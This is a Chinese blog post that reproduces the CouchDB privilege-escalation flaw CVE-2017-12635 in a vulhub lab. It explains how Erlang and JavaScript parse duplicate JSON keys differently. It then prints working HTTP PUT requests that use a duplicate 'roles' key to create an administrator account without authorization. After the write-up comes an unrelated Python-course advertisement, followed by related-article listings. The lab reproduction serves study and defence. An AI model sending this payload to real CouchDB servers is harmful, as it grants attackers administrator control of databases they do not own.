12 - vulhub - Couchdb 垂直权限绕过漏洞(CVE-2017-12635)

于 2024-06-24 13:59:05 发布
阅读量817 收藏 18
点赞数 8
文章标签: couchdb
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60635035/article/details/139924172
版权

Apache CouchDB是一个开源的NoSQL数据库,专注于易用性和成为“完全拥抱web的数据库”。它是一个使用JSON作为数据存储格式,javascript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。

在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。

影响版本

小于 1.7.0 以及 小于 2.1.1

漏洞原理

CVE-2017-12635:Erlang和JavaScript,对JSON解析方式的不同,导致语句执行产生差异性。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。

举例:

Erlang:

jiffy:decode(“{“a”:“1”, “a”:“2”}”).

{[{<<“a”>>,<<“1”>>},{<<“a”>>,<<“2”>>}]}

JavaScript:

JSON.parse(“{“a”:”“, “a”: “”}”)

{a: “”}

在定义一对键值对时,Eralang解析器将存储两个值;javascript只存储第二个值。但jiffy实现时,getter函数只返回第一个值。这里涉及的函数参考:

https://www.anquanke.com/post/id/87256

https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635

漏洞复现

环境准备

靶机环境 139.196.87.102 (vulhub)

攻击机环境 192.168.8.137 (虚拟机 Ubuntu 20、Java1.8、Burp)

启动 Couchdb 垂直权限绕过漏洞 环境

1.进入 vulhub 的 Couchdb 垂直权限绕过漏洞 路径

cd /usr/local/tools/vulhub//couchdb/CVE-2017-12635

2.编译并启动环境

docker-compose up -d

3.查看环境运行状态

docker ps | grep vulhub

在这里插入图片描述

环境启动后,访问http://139.196.87.102:5984/_utils/即可看到一个web页面,说明Couchdb已成功启动。但我们不知道密码,无法登陆。

在这里插入图片描述

漏洞利用

首先,发送如下数据包至: 139.196.87.102:5984

PUT /_users/org.couchdb.user:vulhub HTTP/1.1

Host: 139.196.87.102:5984

Accept: /

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json

Content-Length: 110

{

“type”: “user”,

“name”: “vulhub”,

“roles”: [“_admin”],

“roles”:[],

“password”: “vulhub111”

}

返回403错误,提示 {“error”:“forbidden”,“reason”:“Only _admin may set roles”},只有管理员才能设置Role角色

在这里插入图片描述

这个时候,我们利用 Erlang和JavaScript 处理 JSON 的特性,发送包含两个roles的数据包,即可绕过限制:

PUT /_users/org.couchdb.user:vulhub HTTP/1.1

Host: 139.196.87.102:5984

Accept: /

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json

Content-Length: 108

{

“type”: “user”,

“name”: “vulhub”,

“roles”: [“_admin”],

“roles”: [],

“password”: “vulhub”

}

在这里插入图片描述

验证漏洞利用是否成功

文末有福利领取哦~

👉一、Python所有方向的学习路线

Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。img

👉二、Python必备开发工具

img
👉三、Python视频合集

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
img

👉 四、实战案例

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。(文末领读者福利)
img

👉五、Python练习题

检查学习结果。
img

👉六、面试资料

我们学习Python必然是为了找到高薪的工作,下面这些面试题是来自阿里、腾讯、字节等一线互联网大厂最新的面试资料,并且有阿里大佬给出了权威的解答,刷完这一套面试资料相信大家都能找到满意的工作。
img

img

👉因篇幅有限,仅展示部分资料,这份完整版的Python全套学习资料已经上传

饱和面试题
关注
  • 8
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现----50、Couchdb 垂直权限绕过漏洞CVE-2017-12635
七天
07-08 1580
Couchdb 垂直权限绕过漏洞CVE-2017-12635
Apache CouchDB 垂直权限绕过漏洞 CVE-2017-12635 已亲自复现
qq_42430287的博客
12-18 1333
Apache CouchDB 垂直权限绕过漏洞 CVE-2017-12635 已亲自复现
Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
weixin_46239998的博客
01-01 835
应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。在2017年11月15日,CVE-2017-12635CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。影响版本:小于 1.7.0 以及 小于 2.1.1。密码:password。
CouchDB垂直越权漏洞CVE-2017-12635
Kevin's Blog
07-24 1849
文章目录一、漏洞原理二、触发条件三、漏洞场景 / 挖掘思路四、漏洞复现4.1 漏洞环境4.2 启动环境4.3 访问环境五、防御措施 一、漏洞原理 二、触发条件 三、漏洞场景 / 挖掘思路 四、漏洞复现 4.1 漏洞环境 4.2 启动环境 4.3 访问环境 五、防御措施 ...
Couchdb 垂直权限绕过漏洞CVE-2017-12635
时光凉春衫薄的博客
12-07 2455
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635CVE-2017-12636披露,CVE-2017-12635是由于Erlang和Ja
13 - vulhub - Couchdb 任意命令执行漏洞CVE-2024-12636)
最新发布
04-16 820
这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。基本上主流的和经典的都有,这里我就不放图了,版权问题,个人看看是没有问题的。
nifi-couchdb:与CouchDB 2集成的Nifi处理器
02-03
nifi-couchdb 该项目提供了许多Nifi处理器,用于从CouchDB 2数据库获取文档和数据以及将文档和数据放入CouchDB 2数据库。 尚处于初期阶段-但我们有以下处理器可以工作: GetCouchDBAllDocuments-获取指定数据库的...
bitnami-docker-couchdb:用于CouchDB的Bitnami Docker映像
02-19
什么是CouchDBCouchDB是一个开放源代码NoSQL数据库,用于存储带有JSON文档的数据,您可以通过HTTP访问该文档。 它允许您使用JavaScript索引,合并和转换文档。TL; DR $ docker run --name couchdb bitnami/...
Apache CouchDB信息泄露漏洞(CVE-2023-26268)通告
05-05
Apache CouchDB 信息泄露漏洞(CVE-2023-26268)通告 Apache CouchDB 是一个开源的 NoSQL 文档数据库,以基于 JSON 的文档格式收集和存储数据,提供了高可用性和高可靠性。近日,深信服安全团队监测到 Apache ...
couch-rules-engine:将 CouchDB 用作规则引擎的原型工作
05-31
Couch 规则:使用 CouchDB 作为规则引擎 这是一个原型工作,用于评估使用作为使用内置的规则引擎的基础的适用性。 CouchDB 概述 CouchDB是一个面向文档的数据库,以JSON格式存储文档,支持查询文档。 CouchDB 公开了...
利用Vulnhub复现漏洞 - Couchdb 任意命令执行漏洞CVE-2017-12636)
JiangBuLiu的博客
06-28 1016
Couchdb 任意命令执行漏洞CVE-2017-12636)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现1.6.0 下的说明2.1.0 下的说明利用脚本 Vulnhub官方复现教程 https://vulhub.org/#/environments/couchdb/CVE-2017-12636/ 漏洞原理 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱...
CVE-2017-12635 Couchdb 垂直权限绕过漏洞复现
weixin_45260839的博客
06-18 978
CVE-2017-12635 Couchdb 垂直权限绕过漏洞复现
漏洞复现】vulhub couchdb/CVE-2017-12635
qq_46421742的博客
07-05 159
CouchDB(全称为Apache CouchDB)是一个开源的面向文档的数据库管理系统。它采用了基于文档的NoSQL模型,具有分布式、可扩展和高性能的特点。以下是一些关键特点和优势:文档存储:CouchDB以文档为核心,使用JSON格式存储数据。每个文档都有一个唯一的标识符(ID)和一个JSON格式的内容。这种存储方式使得数据的表示更加灵活和自由。分布式架构:CouchDB支持水平扩展,可以在多个节点上分布数据,实现负载均衡和高可用性。
CouchDB 漏洞复现 CVE-2017-12635/12636
sechelper的博客
02-11 375
CouchDBCVE-2017-1263512636联合利用,详细漏洞复现,exp下载获取
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值